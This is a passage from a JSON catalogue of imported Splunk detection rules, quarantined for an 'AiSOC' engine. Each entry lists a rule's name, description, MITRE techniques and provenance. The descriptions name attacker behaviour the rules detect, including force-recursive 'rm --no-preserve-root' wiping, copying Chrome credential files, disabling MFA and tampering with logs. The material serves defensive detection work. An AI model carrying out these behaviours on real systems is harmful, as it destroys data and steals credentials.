"detections/endpoint/windows_obfuscated_files_or_information_via_rar_sfx.yml" } }, { "id": "splunk-security-content-4af01f6b-d8d4-4f96-8635-758a01557130", "type": "detection", "name": "Windows AD Object Owner Updated", "description": "AD Object Owner Updated. The owner provides Full control level privileges over the target AD Object. This event has significant impact alone and is also a precursor activity for hiding an AD object.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-object-owner-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4af01f6b-d8d4-4f96-8635-758a01557130", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_object_owner_updated.yml" } }, { "id": "splunk-security-content-4b00f134-6d6a-11ec-a90c-acde48001122", "type": "detection", "name": "Linux Sudo OR Su Execution", "description": "The following analytic detects the execution of the \"sudo\" or \"su\" command on a Linux operating system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent process names. This activity is significant because \"sudo\" and \"su\" commands are commonly used by adversaries to elevate privileges, potentially leading to unauthorized access or control over the system. If confirmed malicious, this activity could allow attackers to execute commands with root privileges, leading to severe security breaches, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-sudo-or-su-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4b00f134-6d6a-11ec-a90c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_sudo_or_su_execution.yml" } }, { "id": "splunk-security-content-4b4f8fdd-1f9e-45d8-9b0f-1f64c0b297a4", "type": "detection", "name": "Cisco ASA - Core Syslog Message Volume Drop", "description": "Adversaries may intentionally suppress or reduce the volume of core Cisco ASA syslog messages to evade detection or cover their tracks. This hunting search is recommended to proactively identify suspicious downward shifts or absences in key syslog message IDs, which may indicate tampering or malicious activity. Visualizing this data in Splunk dashboards enables security teams to quickly spot anomalies and investigate potential compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-core-syslog-message-volume-drop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4b4f8fdd-1f9e-45d8-9b0f-1f64c0b297a4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___core_syslog_message_volume_drop.yml" } }, { "id": "splunk-security-content-4bc788d3-c83a-48c5-a4e2-e0c6dba57889", "type": "detection", "name": "Windows Modify Registry DisAllow Windows App", "description": "The following analytic detects modifications to the Windows registry aimed at preventing the execution of specific computer programs. It leverages data from the Endpoint.Registry datamodel, focusing on changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun*\" with a value of \"0x00000001\". This activity is significant as it can indicate an attempt to disable security tools, a tactic used by malware like Azorult. If confirmed malicious, this could allow an attacker to evade detection and maintain persistence on the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disallow-windows-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4bc788d3-c83a-48c5-a4e2-e0c6dba57889", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disallow_windows_app.yml" } }, { "id": "splunk-security-content-4be54858-432f-11ec-8209-3e22fbd008af", "type": "detection", "name": "Scheduled Task Creation on Remote Endpoint using At", "description": "The following analytic detects the creation of scheduled tasks on remote Windows endpoints using the at.exe command. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process creation events involving at.exe with remote command-line arguments. Identifying this activity is significant for a SOC as it may indicate lateral movement or remote code execution attempts by an attacker. If confirmed malicious, this activity could lead to unauthorized access, persistence, or execution of malicious code, potentially resulting in data theft or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/scheduled-task-creation-on-remote-endpoint-using-at.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4be54858-432f-11ec-8209-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/scheduled_task_creation_on_remote_endpoint_using_at.yml" } }, { "id": "splunk-security-content-4c2d198b-da58-48d7-ba27-9368732d0054", "type": "detection", "name": "Windows Multi hop Proxy TOR Website Query", "description": "The following analytic identifies DNS queries to known TOR proxy websites, such as \"*.torproject.org\" and \"www.theonionrouter.com\". It leverages Sysmon EventCode 22 to detect these queries by monitoring DNS query events from endpoints. This activity is significant because adversaries often use TOR proxies to disguise the source of their malicious traffic, making it harder to trace their actions. If confirmed malicious, this behavior could indicate an attempt to obfuscate network traffic, potentially allowing attackers to exfiltrate data or communicate with command and control servers undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multi-hop-proxy-tor-website-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4c2d198b-da58-48d7-ba27-9368732d0054", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_multi_hop_proxy_tor_website_query.yml" } }, { "id": "splunk-security-content-4c38c264-1f74-11ec-b5fa-acde48001122", "type": "detection", "name": "Logon Script Event Trigger Execution", "description": "The following analytic detects the modification of the UserInitMprLogonScript registry entry, which is often used by attackers to establish persistence and gain privilege escalation upon system boot. It leverages data from the Endpoint.Registry data model, focusing on changes to the specified registry path. This activity is significant because it is a common technique used by APT groups and malware to ensure their payloads execute automatically when the system starts. If confirmed malicious, this could allow attackers to maintain persistent access and potentially escalate their privileges on the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1037.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/logon-script-event-trigger-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4c38c264-1f74-11ec-b5fa-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/logon_script_event_trigger_execution.yml" } }, { "id": "splunk-security-content-4c461f5a-c2cc-4e86-b132-c262fc9edca7", "type": "detection", "name": "Windows Special Privileged Logon On Multiple Hosts", "description": "The following analytic detects a user authenticating with special privileges on 30 or more remote endpoints within a 5-minute window. It leverages Event ID 4672 from Windows Security logs to identify this behavior. This activity is significant as it may indicate lateral movement or remote code execution by an adversary. If confirmed malicious, the attacker could gain extensive control over the network, potentially leading to privilege escalation, data exfiltration, or further compromise of the environment. Security teams should adjust detection thresholds based on their specific environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087", "T1021.002", "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-special-privileged-logon-on-multiple-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4c461f5a-c2cc-4e86-b132-c262fc9edca7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_special_privileged_logon_on_multiple_hosts.yml" } }, { "id": "splunk-security-content-4cc015c9-687c-40d2-adcc-46350f66e10c", "type": "detection", "name": "Windows Office Product Loaded MSHTML Module", "description": "The following analytic detects the loading of the mshtml.dll module into an Office product, which is indicative of CVE-2021-40444 exploitation. It leverages Sysmon EventID 7 to monitor image loads by specific Office processes. This activity is significant because it can indicate an attempt to exploit a vulnerability in the MSHTML component via a malicious document. If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further network penetration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-loaded-mshtml-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4cc015c9-687c-40d2-adcc-46350f66e10c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_loaded_mshtml_module.yml" } }, { "id": "splunk-security-content-4d1409df-40c7-4b11-aec4-bd0e709dfc12", "type": "detection", "name": "Windows Modify Registry Auto Update Notif", "description": "The following analytic detects a suspicious modification to the Windows registry that changes the auto-update notification setting to \"Notify before download.\" This detection leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values. This activity is significant because it is a known technique used by adversaries, including malware like RedLine Stealer, to evade detection and potentially deploy additional payloads. If confirmed malicious, this modification could allow attackers to bypass security measures, maintain persistence, and exploit vulnerabilities on the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-auto-update-notif.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d1409df-40c7-4b11-aec4-bd0e709dfc12", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_auto_update_notif.yml" } }, { "id": "splunk-security-content-4d14c86d-fdee-4393-94da-238d2706902f", "type": "detection", "name": "Windows Credentials from Password Stores Chrome Copied in TEMP Dir", "description": "The following analytic detects the copying of Chrome's Local State and Login Data files into temporary folders, a tactic often used by the Braodo stealer malware. These files contain encrypted user credentials, including saved passwords and login session details. The detection monitors for suspicious copying activity involving these specific Chrome files, particularly in temp directories where malware typically processes the stolen data. Identifying this behavior enables security teams to act quickly, preventing attackers from decrypting and exfiltrating sensitive browser credentials and mitigating the risk of unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-chrome-copied-in-temp-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d14c86d-fdee-4393-94da-238d2706902f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_chrome_copied_in_temp_dir.yml" } }, { "id": "splunk-security-content-4d28013d-3a0f-4d65-a33f-4e8009fee0ae", "type": "detection", "name": "O365 Email Security Feature Changed", "description": "The following analytic identifies when specific O365 advanced security settings are altered within the Office 365 tenant. If an attacker successfully disables O365 security settings, they can operate within the tenant with reduced risk of detection. This can lead to unauthorized data access, data exfiltration, account compromise, or other malicious activities without leaving a detailed audit trail.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-security-feature-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d28013d-3a0f-4d65-a33f-4e8009fee0ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_security_feature_changed.yml" } }, { "id": "splunk-security-content-4d2df5e0-1092-4817-88a8-79c7fa054668", "type": "detection", "name": "ASL AWS Multi-Factor Authentication Disabled", "description": "The following analytic detects attempts to disable multi-factor authentication (MFA) for an AWS IAM user. It leverages Amazon Security Lake logs, specifically monitoring for `DeleteVirtualMFADevice` or `DeactivateMFADevice` API operations. This activity is significant as disabling MFA can indicate an adversary attempting to weaken account security to maintain persistence using a compromised account. If confirmed malicious, this action could allow attackers to retain access to the AWS environment without detection, potentially leading to unauthorized access to sensitive resources and prolonged compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d2df5e0-1092-4817-88a8-79c7fa054668", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_multi_factor_authentication_disabled.yml" } }, { "id": "splunk-security-content-4d33a488-5b5f-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious mshta spawn", "description": "The following analytic detects the spawning of mshta.exe by wmiprvse.exe or svchost.exe. This behavior is identified using Endpoint Detection and Response (EDR) data, focusing on process creation events where the parent process is either wmiprvse.exe or svchost.exe. This activity is significant as it may indicate the use of a DCOM object to execute malicious scripts via mshta.exe, a common tactic in sophisticated attacks. If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to system compromise and further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-mshta-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d33a488-5b5f-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_mshta_spawn.yml" } }, { "id": "splunk-security-content-4d347c4a-306e-41db-8d10-b46baf71b3e2", "type": "detection", "name": "AWS Credential Access GetPasswordData", "description": "The following analytic identifies more than 10 GetPasswordData API calls within a 5-minute window in your AWS account. It leverages AWS CloudTrail logs to detect this activity by counting the distinct instance IDs accessed. This behavior is significant as it may indicate an attempt to retrieve encrypted administrator passwords for running Windows instances, which is a critical security concern. If confirmed malicious, attackers could gain unauthorized access to administrative credentials, potentially leading to full control over the affected instances and further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-credential-access-getpassworddata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d347c4a-306e-41db-8d10-b46baf71b3e2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_credential_access_getpassworddata.yml" } }, { "id": "splunk-security-content-4d3a17b3-0a6d-4ae0-9421-46623a69c122", "type": "detection", "name": "Kubernetes Suspicious Image Pulling", "description": "The following analytic detects suspicious image pulling in Kubernetes environments. It identifies this activity by monitoring Kubernetes audit logs for image pull requests that do not match a predefined list of allowed images. This behavior is significant for a SOC as it may indicate an attacker attempting to deploy malicious software or infiltrate the system. If confirmed malicious, the impact could be severe, potentially leading to unauthorized access to sensitive systems or data, and enabling further malicious activities within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-suspicious-image-pulling.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d3a17b3-0a6d-4ae0-9421-46623a69c122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_suspicious_image_pulling.yml" } }, { "id": "splunk-security-content-4d4332ae-792c-11ec-89c1-acde48001122", "type": "detection", "name": "Suspicious Process With Discord DNS Query", "description": "The following analytic identifies a process making a DNS query to Discord, excluding legitimate Discord application paths. It leverages Sysmon logs with Event ID 22 to detect DNS queries containing \"discord\" in the QueryName field. This activity is significant because Discord can be abused by adversaries to host and download malicious files, as seen in the WhisperGate campaign. If confirmed malicious, this could indicate malware attempting to download additional payloads from Discord, potentially leading to further code execution and compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-process-with-discord-dns-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d4332ae-792c-11ec-89c1-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/suspicious_process_with_discord_dns_query.yml" } }, { "id": "splunk-security-content-4d5a05fa-77d9-4fd0-af9c-05704f9f9a88", "type": "detection", "name": "Linux APT Privilege Escalation", "description": "The following analytic detects the use of the Advanced Package Tool (APT) or apt-get with elevated privileges via sudo on Linux systems. It leverages Endpoint Detection and Response (EDR) telemetry to identify processes where APT commands are executed with sudo rights. This activity is significant because it indicates a user can run system commands as root, potentially leading to unauthorized root shell access. If confirmed malicious, this could allow an attacker to escalate privileges, execute arbitrary commands, and gain full control over the affected system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-apt-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d5a05fa-77d9-4fd0-af9c-05704f9f9a88", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_apt_privilege_escalation.yml" } }, { "id": "splunk-security-content-4d7e8f3a-9c2b-4e6f-8a1d-5b9c7e2f4a8c", "type": "detection", "name": "Cisco ASA - Device File Copy Activity", "description": "This analytic detects file copy activity on Cisco ASA devices via CLI or ASDM.\nAdversaries may copy device files including configurations, logs, packet captures, or system files for reconnaissance, credential extraction, or data exfiltration. While legitimate file operations occur during backups and maintenance, unauthorized copies may indicate malicious activity.\nThe detection monitors for command execution events (message ID 111008 or 111010) containing copy commands targeting running-config, startup-config, packet capture files, or other system files from disk0:, flash:, system:, or capture: locations.\nInvestigate unexpected file copies, especially from non-administrative accounts, during unusual hours, or when combined with other suspicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005", "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-device-file-copy-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4d7e8f3a-9c2b-4e6f-8a1d-5b9c7e2f4a8c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___device_file_copy_activity.yml" } }, { "id": "splunk-security-content-4da5ce1a-f71b-4e71-bb73-c0a3c73f3c3c", "type": "detection", "name": "Linux Auditd Data Destruction Command", "description": "The following analytic detects the execution of a Unix shell command designed to wipe root directories on a Linux host. It leverages data from Linux Auditd, focusing on the 'rm' command with force recursive deletion and the '--no-preserve-root' option. This activity is significant as it indicates potential data destruction attempts, often associated with malware like Awfulshred. If confirmed malicious, this behavior could lead to severe data loss, system instability, and compromised integrity of the affected Linux host. Immediate investigation and response are crucial to mitigate potential damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-data-destruction-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4da5ce1a-f71b-4e71-bb73-c0a3c73f3c3c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_data_destruction_command.yml" } }, { "id": "splunk-security-content-4de73044-9a1d-4a51-a1c2-85267d8dcab3", "type": "detection", "name": "Linux Auditd Find Credentials From Password Stores", "description": "The following analytic detects suspicious attempts to find credentials stored in password stores, indicating a potential attacker's effort to access sensitive login information. Password stores are critical repositories that contain valuable credentials, and unauthorized access to them can lead to significant security breaches. By monitoring for unusual or unauthorized activities related to password store access, this analytic helps identify potential credential theft attempts, allowing security teams to respond promptly and prevent unauthorized access to critical systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-find-credentials-from-password-stores.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4de73044-9a1d-4a51-a1c2-85267d8dcab3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_find_credentials_from_password_stores.yml" } }, { "id": "splunk-security-content-4df275fd-a0e5-4246-8b92-d3201edaef7a", "type": "detection", "name": "O365 ZAP Activity Detection", "description": "The following analytic detects when the Microsoft Zero-hour Automatic Purge (ZAP) capability takes action against a user's mailbox. This capability is an enhanced protection feature that retro-actively removes email with known malicious content for user inboxes. Since this is a retroactive capability, there is still a window in which the user may fall victim to the malicious content.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-zap-activity-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4df275fd-a0e5-4246-8b92-d3201edaef7a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_zap_activity_detection.yml" } }, { "id": "splunk-security-content-4e127857-1fc9-4c95-9d69-ba24c91d52d7", "type": "detection", "name": "ConnectWise ScreenConnect Path Traversal Windows SACL", "description": "The following analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability using Windows SACL EventCode 4663. It identifies path traversal attacks by monitoring file system events related to the ScreenConnect service. This activity is significant as it allows unauthorized access to sensitive files and directories, potentially leading to data exfiltration or arbitrary code execution. If confirmed malicious, attackers could gain unauthorized access to critical data or execute harmful code, compromising the integrity and security of the affected system. Immediate remediation by updating to version 23.9.8 or above is recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/connectwise-screenconnect-path-traversal-windows-sacl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e127857-1fc9-4c95-9d69-ba24c91d52d7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/connectwise_screenconnect_path_traversal_windows_sacl.yml" } }, { "id": "splunk-security-content-4e12db1f-f7c7-486d-8152-a221cad6ac2b", "type": "detection", "name": "O365 New MFA Method Registered", "description": "The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for a user account within Office 365. It leverages O365 audit logs to identify changes in MFA configurations. This activity is significant as it may indicate an attacker's attempt to maintain persistence on a compromised account. If confirmed malicious, the attacker could bypass existing security measures, solidify their access, and potentially escalate privileges or access sensitive data. Immediate verification and remediation are required to secure the affected account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-new-mfa-method-registered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4e12db1f-f7c7-486d-8152-a221cad6ac2b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_new_mfa_method_registered.yml" } }, { "id": "splunk-security-content-4e3c26f2-4fb9-4bd7-ab46-1b76ffa2a23b", "type": "detection", "name": "AWS New MFA Method Registered For User", "description": "The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for an AWS account. It leverages AWS CloudTrail logs to identify the `CreateVirtualMFADevice` event. This activity is significant because adversaries who gain unauthorized access to an AWS account may register a new MFA method to maintain persistence. If confirmed malicious, this could allow attackers to secure their access, making it difficult to detect and remove their presence, potentially leading to further unauthorized activities and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ 